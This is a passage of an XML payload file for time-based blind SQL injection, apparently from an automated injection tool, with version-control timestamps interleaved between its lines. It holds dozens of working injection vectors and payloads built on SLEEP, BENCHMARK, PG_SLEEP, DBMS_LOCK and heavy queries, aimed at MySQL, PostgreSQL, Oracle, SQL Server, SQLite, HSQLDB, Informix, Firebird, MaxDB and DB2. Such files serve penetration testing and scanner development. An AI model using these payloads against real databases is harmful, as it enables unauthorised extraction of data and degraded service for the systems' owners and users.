<vector > AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
</test>
<test >
<title > HSQLDB > = 1.7.2 OR time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
2015-03-03 17:22:20 +03:00
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-03-03 17:22:20 +03:00
<title > HSQLDB > 2.0 AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
<title > HSQLDB > 2.0 OR time-based blind (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > HSQLDB > 2.0 AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
<title > HSQLDB > 2.0 OR time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request >
<payload > OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
2016-09-28 11:30:09 +03:00
<test >
<title > Informix AND time-based blind (heavy query)</title>
<stype > 5</stype>
<level > 2</level>
<risk > 2</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Informix</dbms>
</details>
</test>
<test >
<title > Informix OR time-based blind (heavy query)</title>
<stype > 5</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Informix</dbms>
</details>
</test>
<test >
<title > Informix AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Informix</dbms>
</details>
</test>
<test >
<title > Informix OR time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 3</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Informix</dbms>
</details>
</test>
2015-03-19 15:09:43 +03:00
<!-- End of time - based boolean tests -->
2015-02-18 13:13:44 +03:00
2015-03-19 15:09:43 +03:00
<!-- Time - based boolean tests - Numerous clauses -->
2015-02-20 18:44:06 +03:00
<!-- This payload does not work with SLEEP() -->
2015-02-18 13:13:44 +03:00
<test >
2015-03-19 15:09:43 +03:00
<title > MySQL > = 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 3</level>
2015-02-20 18:44:06 +03:00
<risk > 2</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
<request >
<payload > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > MySQL > = 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-19 15:09:43 +03:00
<level > 5</level>
<risk > 2</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-19 15:09:43 +03:00
<payload > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
<comment > #</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-19 15:09:43 +03:00
<!-- End of time - based boolean tests - Numerous clauses -->
2015-02-18 13:13:44 +03:00
2015-03-19 15:09:43 +03:00
<!-- Time - based boolean tests - Parameter replace -->
2015-02-18 13:13:44 +03:00
<test >
2015-03-19 15:09:43 +03:00
<title > MySQL > = 5.0.12 time-based blind - Parameter replace</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-19 15:09:43 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2016-05-28 00:58:42 +03:00
<vector > (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-05-28 00:58:42 +03:00
<payload > (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-05-28 00:58:42 +03:00
<title > MySQL > = 5.0.12 time-based blind - Parameter replace (substraction)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2019-05-20 13:41:41 +03:00
<vector > (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2015-02-18 13:13:44 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2016-05-28 00:58:42 +03:00
<vector > (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-05-28 00:58:42 +03:00
<payload > (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > < 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-25 12:16:01 +03:00
<title > MySQL time-based blind - Parameter replace (bool)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2015-02-25 12:16:01 +03:00
<vector > ([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-25 12:16:01 +03:00
<payload > ([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > MySQL time-based blind - Parameter replace (ELT)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2015-03-19 15:09:43 +03:00
<vector > ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-19 15:09:43 +03:00
<payload > ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2015-03-19 15:09:43 +03:00
<title > MySQL time-based blind - Parameter replace (MAKE_SET)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2015-03-19 15:09:43 +03:00
<vector > MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-19 15:09:43 +03:00
<payload > MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL > 8.1 time-based blind - Parameter replace</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request >
<payload > (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
</details>
</test>
<!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E - Business Suite Financials -->
<test >
<title > Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype > 5</stype>
<level > 3</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<request >
<payload > BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle time-based blind - Parameter replace (heavy queries)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > SQLite > 2.0 time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
<request >
<payload > (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
<title > Firebird time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request >
<payload > (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
<test >
<title > SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request >
<payload > (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > IBM DB2 time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request >
<payload > (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > IBM DB2</dbms>
</details>
</test>
2016-09-28 11:30:09 +03:00
2015-02-18 13:13:44 +03:00
<!-- Untested -->
<test >
<title > HSQLDB > = 1.7.2 time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
</test>
<test >
<title > HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
2016-09-28 11:30:09 +03:00
<test >
<title > Informix time-based blind - Parameter replace (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request >
<payload > (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Informix</dbms>
</details>
</test>
2015-03-19 15:09:43 +03:00
<!-- End of time - based boolean tests - Parameter replace -->
2015-02-18 13:13:44 +03:00
2015-03-19 15:09:43 +03:00
<!-- Time - based boolean tests - ORDER BY, GROUP BY clause -->
2015-02-18 13:13:44 +03:00
<test >
2015-03-19 15:09:43 +03:00
<title > MySQL > = 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2016-05-28 00:58:42 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-05-28 00:58:42 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > < 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
